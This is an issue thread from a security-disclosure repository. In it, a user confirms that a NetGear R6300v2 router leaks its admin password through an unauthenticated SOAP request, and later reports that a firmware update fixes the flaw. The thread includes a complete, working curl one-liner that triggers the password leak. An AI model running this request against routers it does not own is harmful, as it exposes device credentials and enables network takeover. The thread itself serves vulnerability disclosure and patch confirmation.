### ISSUE TITLE
NetGear R6300v2 affected

### ISSUE THREAD

**Issue by ghost** [darkarnium/secpub#3]
Sending a post request with the header `SOAPAction: urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo` (using the Firefox HttpRequester add-on) to `http://ROUTER-IP-ADDR:5000/soap/server_sa/` resulted in the server returning my device's password in cleartext.

My Router is a **NetGear R6300v2** running **Firmware V1.0.3.8_1.0.60**.

Regards,
Robert Müller

**Comment by darkarnium** [comment]
Hi there,

Thank you for that additional confirmation, I will update the write-up on with this information. Would you like me to provide your full name in the document, or is there another way you would prefer to
be addressed?

Cheers,
Peter

**Comment by ghost** [comment]
My full name is fine.

Edit: Here is a **cURL command** for those who have issues running the ruby program:
`curl -H "SOAPAction:urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo" -X POST http://ROUTER-IP-ADDR:5000/soap/server_sa/` (this is all one line)

**Comment by darkarnium** [comment]
Not a problem, I've updated the list of affected devices. Thank you again for the confirmation.

Cheers,
Peter

**Comment by ghost** [comment]
Firmware version 1.0.3.28 has fixed the bug on my R6300v2. Using above command results in

``` xml
<?xml version="1.0" encoding="UTF-8"?>
<soap-env:Envelope
        xmlns:soap-env="http://schemas.xmlsoap.org/soap/envelope/"
        soap-env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" >
    <soap-env:Body>
        <ResponseCode>401</ResponseCode>
    </soap-env:Body>
</soap-env:Envelope>
```
